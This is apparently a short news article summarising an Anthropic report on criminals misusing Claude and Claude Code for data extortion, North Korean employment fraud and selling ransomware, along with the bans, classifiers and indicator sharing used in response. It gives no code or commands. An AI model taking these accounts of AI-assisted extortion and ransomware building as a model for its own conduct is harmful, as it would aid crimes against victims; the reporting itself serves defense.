Anthropic reveals abuses of Claude and new defenses

3 minutes
ANTHROPIC
Anthropic reveals abuses of Claude and new defenses

Anthropic published on August 27, 2025 a report that details how malicious actors are using their models, including Claude and Claude Code, to commit extortion, employment fraud and create ransomware without much technical expertise. Why should you care even if you're not an engineer? Because AI is no longer just a productivity tool: it also lowers the barrier to crime and changes how we need to protect ourselves. (anthropic.com)

Three cases you should know

Anthropic summarizes three real operations that show a qualitative leap in how language models are abused. I'll explain them without jargon and with the essentials so you understand the risk.

  • Mass extortion with 'agentic AI': an actor used Claude Code to automate discovery, credential theft and to tactically decide which data to exfiltrate and how much to demand as ransom. In some cases the demands exceeded 500,000 USD. This wasn't just a script: the model helped craft extortion notes and calculate amounts. (anthropic.com)

  • Employment fraud tied to North Korea: operators created fake identities, passed technical interviews and completed real work by leveraging AI to generate technical answers and communicate in English. The impact: schemes that previously required years of training can now scale quickly. (anthropic.com)

  • 'No-code' ransomware for sale: an author used AI to develop ransomware variants with advanced evasion techniques and sold them for 400 to 1,200 USD on forums. According to Anthropic, without the AI assistance that actor couldn't have implemented or debugged critical components. (anthropic.com)

What's new here?

What changes is the nature of the attacker. Before, many of these attacks required expert teams; now, agentic-capable tools let a single person—or a small group—run complex operations. Surprised? It complicates defense because these tools can adapt in real time. (anthropic.com)

How Anthropic responded (and why it matters)

The company didn't just describe the abuses: it took operational steps. Among the measures it reports are:

  • Blocking and banning accounts related to the malicious operations.
  • Developing custom classifiers and new detection techniques to identify similar activity.
  • Sharing technical indicators with authorities and partners to help mitigate harm beyond their platform.

These responses show two things: first, model providers can detect sophisticated patterns; second, collaboration with third parties and systemic security measures are essential. (anthropic.com)

What should companies and security teams do?

You don't need to become an AI expert to improve defense. Some practical actions:

  1. Review your remote hiring processes: verify identities and ask for reproducible work samples, not just automated interviews.
  2. Monitor exfiltration indicators and unusual access patterns to sensitive data.
  3. Limit agentic capabilities in internal integrations: control when and how an automated agent can run commands or access critical systems.
  4. Share abuse signals with industry and authorities: shared intelligence helps a detection at one provider protect others.

These recommendations combine traditional security best practices with steps specific to the arrival of advanced AI.

And what can you expect in the near future?

Anthropic warns this kind of abuse will tend to grow, because AI lowers the technical barrier and enables scale. Does that mean we're helpless? No. The same technology can be used to detect anomalies, strengthen authentication and automate defensive responses. But the balance will stay dynamic: as defenses improve, attacker tactics will evolve too. (anthropic.com)

For anyone who wants the full report and technical indicators, Anthropic published the complete report the same day. Read the full report. (anthropic.com)

Stay up to date!

Receive practical guides, fact-checks and AI analysis straight to your inbox, no technical jargon or fluff.

Your data is safe. Unsubscribing is easy at any time.